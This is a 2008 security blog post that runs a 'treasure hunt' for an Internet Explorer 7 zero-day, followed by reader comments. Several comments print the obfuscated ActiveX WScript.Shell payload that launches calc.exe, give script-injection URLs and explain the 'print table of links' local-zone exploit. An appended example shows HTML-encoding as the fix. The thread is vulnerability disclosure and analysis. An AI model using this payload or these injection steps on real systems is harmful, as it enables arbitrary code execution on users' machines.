If at first you don't succeed; call it version 1.0
Wednesday, 07 May 2008

[And the winner is: George the Greek]
Today we are celebrating, here in Israel, 60 years of being an independent country. As part of the celebration, I’m releasing a new 0day vulnerability.
One of our customs on Independence Day is to play a “treasure hunt” game. In this game there is a treasure hidden somewhere in our beautiful country, and we get mysterious clues that help us find this treasure by traveling to many great sites all over Israel.
In the spirit of this day, I’ve decided not to release full details about this vulnerability yet, but rather play a little “treasure hunt” game.
Somewhere in my blog, I embedded proof-of-concept code which exploits this 0day vulnerability. The following are some clues that will help you find this 0day treasure:
  1) IE7.0 and IE8.0b users will get pwned.
  2) An interaction with the sploit is needed.
  3) There’s no need to find the post. It’s everywhere.
  4) 404 is the way to go.
  5) Acidus was right! Local resources is the key.
  6) What else can you do with an anchor? Think out of the box, literally.
  7) Charles Babbage is probably turning in his grave.
  8) The following screenshot should really help you find the source of the treasure:
     [screenshot]
  9) Put the videos together to find the treasure.
     [videos]

Every day or two I will add a new clue to this list, in the hope that by next Wednesday someone will eventually find the treasure :-)
Next Wednesday I will release the full technical details of this 0day vulnerability and the proof-of-concept code.
Until then, feel free to comment your findings. The first person to post a comment with the proof-of-concept code and details on how to use it to exploit the vulnerability will be declared the winner.
Now, I don’t have any laptop prize to give the winner. But, besides the credit for being the first to find a 0day treasure, I’m willing to offer the winner free entrance to the IsraCON security conference that will take place in Israel this summer.

Happy hunting!

[UPDATE 08-May-2008] Some of you guys out there are already in the right direction, some are not. I've added 2 more clues.
[UPDATE 10-May-2008] You are getting closer. Pay attention to clue number 6.
[UPDATE 11-May-2008] Yet another clue added.
[UPDATE 12-May-2008] I've added a new screenshot clue. 
[UPDATE 13-May-2008] Last clue added (3 videos). The game will end tomorrow evening (Israel time). You still have enough time to find the treasure.
[UPDATE 14-May-2008 02:30] And we have a winner! Details soon...
[UPDATE 14-May-2008 16:15] The winner is: George the Greek. Congratulations! Full technical details of the vulnerability are available here.


Wednesday, 07 May 2008 17:07:30 UTC | Comments [26] | General | Security
Wednesday, 07 May 2008 21:04:19 UTC
Does the exploit have something to do with this comment form?
Wednesday, 07 May 2008 21:20:14 UTC
Nope.
Thursday, 08 May 2008 12:42:53 UTC
I know that you're a big fan of XSS...is it a reflected XSS in the ASP framework?
It's not fair -i know- so let's search it during the next coffee break :)
Thursday, 08 May 2008 14:03:37 UTC
It's not hidden in the site's source somewhere, is it?
no.skill
Thursday, 08 May 2008 15:19:20 UTC
In track.aspx, you're plucking characters for your exploit out of the XMLHTTP response for the trex.aspx 404 page. But your exploit code doesn't run, even if I change it to be appended to EVERY hyperlink on your page instead of just one random link. When I click the links, I just go to the page and your CT.aspx page strips off the exploit code. WScript.Shell never even tries to run, since it's not marked safe for scripting.

Where's the beef?
Thursday, 08 May 2008 15:35:36 UTC
I use Spybot: Search & Destroy. It has a feature that informs me if certain registry entries are added or changed.

When I opened this page in Internet Explorer, Spybot popped up telling me that a registry entry is being changed, as follows:
Category: User-specific browser toolbar
Change: Value added
Entry: ITBar7Layout
Old data: (there is none)
New data: hex:13,00,00,00,00,00,00,00,00,00,00,00,30, (the pop-up cannot show more)

It looks like the exploit has something to do with this... does it create a new tool bar, or manipulate an existing toolbar? What precisely is "ITBar7Layout"?

Addendum: It looks as if this has something to do with IE7's toolbar. Maybe if you allow the registry change and then show the toolbar... I will try that now, and then see what happens. (Maybe all the 00 values result in a buffer overflow?)

Looking at the code, I see that there is a hidden form element with the name of "__VIEWSTATE". It has a ridiculously long value associated with it. The form itself (having name "mainForm") is submitted when JavaScript function "__doPostBack" is activated. However, I am not certain what will trigger that function.

Am I getting close here?
Thursday, 08 May 2008 16:26:16 UTC
I love Palestina...

Peace for Palestina and Israel people.
Thursday, 08 May 2008 18:11:48 UTC
I didn't see anything, I didn't notice any exploit being executed, and no error appeared.
Thursday, 08 May 2008 21:40:59 UTC
Happy 60th Anniversary to Israel!

Aviv- great job on this initiative, kol hakavod!
Friday, 09 May 2008 12:38:55 UTC
Dude, I wouldn't be afraid of your 0-day exploit. I mean, what about all those tables?!?

/funny
Friday, 09 May 2008 13:05:30 UTC
It doesn't have anything to do with the file called Microsummary.ashx? Just a guess.
Friday, 09 May 2008 15:23:14 UTC
well the code that is being run is:

var x=new ActiveXObject('W'+'S'+'c'+'r'+'i'+'p'+'t'+'.'+'S'+'h'+'e'+'l'+'l');x.Run('c'+'a'+'l'+'c'+'.'+'e'+'x'+'e');

which, like Frank said above, is auto-generated from a 404 page and randomly appended to a URL. But it never runs?! Is that it?!
Friday, 09 May 2008 16:30:16 UTC
Well, you do manage to modify (with track.aspx using XmlHttpRequest to get trex.aspx 404 page and building a URL "add-on" from its chars) a pseudo-random link on your page like this:

http://aviv.raffon.net/CategoryView,category,Security.aspx/?&trackid=68ede44f70bb4790ab79a58c072a470a6007e76202d44d1ba4f8bc9c0802f2c4616937f1bfb94cb4bdfd5a08c3939a3&trex=<script defer>var x=new ActiveXObject('W'+'S'+'c'+'r'+'i'+'p'+'t'+'.'+'S'+'h'+'e'+'l'+'l');x.Run('c'+'a'+'l'+'c'+'.'+'e'+'x'+'e');</script>

But it does nothing for me when I click on such a link in IE7. calc.exe is not started.
Friday, 09 May 2008 19:06:34 UTC
Is Vista's IE7 protected mode vulnerable? Is the flaw exploitable only on XP?
Friday, 09 May 2008 22:00:23 UTC
I found that you should just request the trex page, because it modifies trex, so the link should look like this:
http://aviv.raffon.net/trex?&trackid=867b06ed037446d58203a180f2f58a41c715bb36d06c462d85dfe9f8ba640f82deb167ca407246189f401dd8c61d4bef&trex=<script%20defer>var%20x=new%20ActiveXObject('W'+'S'+'c'+'r'+'i'+'p'+'t'+'.'+'S'+'h'+'e'+'l'+'l');x.Run('c'+'a'+'l'+'c'+'.'+'e'+'x'+'e');</script>

But, in IE7 running on Vista the code is blocked and this information is displayed:
"A potentially dangerous Request.QueryString value was detected from the client (trex="<script defer>var x=...")."

Any other idea?
Friday, 09 May 2008 23:07:22 UTC
Put the code:

<html><script>var x=new ActiveXObject('W'+'S'+'c'+'r'+'i'+'p'+'t'+'.'+'S'+'h'+'e'+'l'+'l');x.Run('c'+'a'+'l'+'c'+'.'+'e'+'x'+'e');</script></html>

into a blank file (e.g. C:\aviv.html), and open it. After allowing the ActiveX to run, calc.exe will run.

Now, if you'd set validateRequest=false in your server config (if you can), it will let the URL

http://aviv.raffon.net/trex?&trackid=867b06ed037446d58203a180f2f58a41c715bb36d06c462d85dfe9f8ba640f82deb167ca407246189f401dd8c61d4bef&trex=<scri%70t%20defer>var%20x=new%20ActiveXObject('W'+'S'+'c'+'r'+'i'+'p'+'t'+'.'+'S'+'h'+'e'+'l'+'l');x.Run('c'+'a'+'l'+'c'+'.'+'e'+'x'+'e');</script>

through.

Scott
Saturday, 10 May 2008 02:36:21 UTC
I think the whole link-appending thing is a red herring. That's what makes for a good treasure hunt, am I right? If you notice the chosen link has a ?trackid argument that is appended by the javascript, there's no reason for that to be put there if the exploit was as simple as appending wscript.shell...etc to a link.
Saturday, 10 May 2008 12:45:07 UTC
I think one or other of Windows' components, such as the gadget sidebar or the favourites toolbar within IE, renders a failed attempt to fetch a page which results in a 404 in such a way that the URL is embedded in the rendered response. I'd go with the gadget sidebar here because it basically renders using the IE engine. From there on in, it's a straightforward case of XSS into the local zone, allowing WScript.Shell to be invoked. So that's the theoretical; if I'm right, all I need to do is find the place where the 404 is rendered as such.
Sunday, 11 May 2008 14:33:42 UTC
Specifically LINE 4, fails when run via a CLIENT accessing a LOCAL SERVER:

<script language=JavaScript>
function fn_DPW (a)
{
MyObject = new ActiveXObject("WScript.Shell");
}
</script>
The page cannot be displayed---404
HTA has no security restrictions when coded correctly: The following tag MUST be in the <head> tags or above:

<HTA:APPLICATION ></HTA:APPLICATION>

enjoy and have fun - Encryp+!0n
Sunday, 11 May 2008 14:58:30 UTC
accessKey property?
Sunday, 11 May 2008 19:30:44 UTC
If this vulnerability is really some ub3rian 0day I'd rather sell it than just throw it away ..
anywayz.. that's just me
you whitey ass/hats have fun now :)
Exodus
Monday, 12 May 2008 13:02:40 UTC
Insert this in the URL: <script type="text/javascript">_uacct = "UA-603122-1";urchinTracker();</script>.

Cause 404 error method framework from client
http://aviv.raffon.net/<script type="text/javascript">_uacct = "UA-603122-1";urchinTracker();</script>
Monday, 12 May 2008 17:18:45 UTC
Looking at the code you use, you're doing an XMLHttpRequest to /track/trex.aspx, which looks like it is the same post we're looking at. Then, you use characters carefully selected from the GET HTTP response to modify the links.
I check the http response here (http://www.websiteoptimization.com/services/analyze/index.html) from track.aspx and it works, but when sending an http request to trex.aspx, it displays a 404 response. The funny thing is that it happens when trying to display it in FF 3 as well (the first time), then I reload and it displays your blog's main page.
Also, when trying track.aspx in FF, it shows the whole code. In IE7 it says:

"Can't display the XML site... A semicolon (;) was expected. Error in processing of http://aviv.raffon.net/track/track.aspx. Line 9,... ancs[parseInt(Math.random(10)*ancs.length)].href+='/?&trackid=bde2504d97fc4d219123b0af1c20794cded945797b094715a3bcb28c1f..."

I guess that, including the right stuff in the call to track.aspx get parameters, it'll call applications in client PC.
Monday, 12 May 2008 17:37:42 UTC
what if using the known mailto:test%../../../../../windows/system32/calc.exe thing?
Tuesday, 13 May 2008 18:54:09 UTC
the 3 videos suggest these words? print, table, text ?
endOfEnd
Tuesday, 13 May 2008 22:45:29 UTC
Well, I guess the deadline is approaching... I'm pretty sure somebody figured it out days ago and you are waiting until Wednesday to announce it, but in case they haven't... here it goes:

Exploit:

1) Visit http://aviv.raffon.net/2008/05/07/HappyBirthdayIsrael.aspx, an innocent looking webpage. Oh look, this page appends some text at the end of a random HTML-anchored link.

2) Oh well, let's go ahead and print a copy of this web page. File menu, "Print...". Hmm, maybe it would be nice to enable Internet Explorer's handy "Print table of links" under the "Options" tab of the print dialog window.

3) Wait a minute, I didn't ask the Windows calculator to be executed!

Description:

On the "innocent" webpage there is an HTML script tag that references "/track/track.aspx". This script pieces together the exploit code and randomly appends it to one of the links on the "innocent" page.

When the Internet Explorer print subsystem kicks in, the embedded javascript within the link is executed in the local context.

Pretty cool, but most likely will only affect librarians... I don't know anyone else who actually uses this feature. :-)

Greetz to jh and bc!
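The comment above names the root cause: a feature that renders each link's URL into a new HTML document in the local zone took the href text as-is, so markup hidden in a URL became live script in a privileged context. The following is an added example, not code from the post or from any commenter, showing that bug as an output-encoding defect: the same "table of links" built first by raw string concatenation and then with HTML encoding, plus a check that tells the two apart. The anchor list, the field names and the `<script>` placeholder in the second href are constructed for the example.

```javascript
// Added example (not from the original post or its comments): the unsafe
// pattern behind "print table of links" next to the encoded version.

// Minimal HTML entity encoder covering the characters that can break out of
// text or attribute context. (Constructed helper, not a library API.)
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Unsafe: the href and link text are concatenated straight into the output
// document, so any markup inside a URL is interpreted by the renderer.
function buildLinkTableUnsafe(anchors) {
  const rows = anchors.map(
    (a, i) => `<tr><td>${i + 1}</td><td>${a.text}</td><td>${a.href}</td></tr>`
  );
  return `<table>${rows.join("")}</table>`;
}

// Fixed: every untrusted value is encoded for the HTML text context it lands
// in, so a URL that contains "<script>" is displayed, never executed.
function buildLinkTableSafe(anchors) {
  const rows = anchors.map(
    (a, i) =>
      `<tr><td>${i + 1}</td><td>${escapeHtml(a.text)}</td>` +
      `<td>${escapeHtml(a.href)}</td></tr>`
  );
  return `<table>${rows.join("")}</table>`;
}

// Check used by the test: does the rendered document contain a live <script>
// start tag, i.e. did the URL's markup survive as markup rather than text?
function containsLiveScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed sample: one ordinary link and one whose href carries markup in
// a query parameter, in the shape the comments above describe. The script
// body is a placeholder comment, not a payload.
const SAMPLE_ANCHORS = [
  { text: "Security", href: "/CategoryView,category,Security.aspx" },
  { text: "Archive", href: "/archive.aspx?trex=<script defer>/* placeholder */</script>" },
];

console.log("unsafe renders live script:", containsLiveScriptTag(buildLinkTableUnsafe(SAMPLE_ANCHORS)));
console.log("safe renders live script:  ", containsLiveScriptTag(buildLinkTableSafe(SAMPLE_ANCHORS)));
```

The ASP.NET message quoted earlier in the thread ("A potentially dangerous Request.QueryString value was detected") is a server-side input filter; it does nothing for a consumer that later renders the URL itself. The fix belongs in whatever component writes the URL into HTML, as `buildLinkTableSafe` does, and it has to encode for the exact context (text node here; attribute or URL contexts need their own rules).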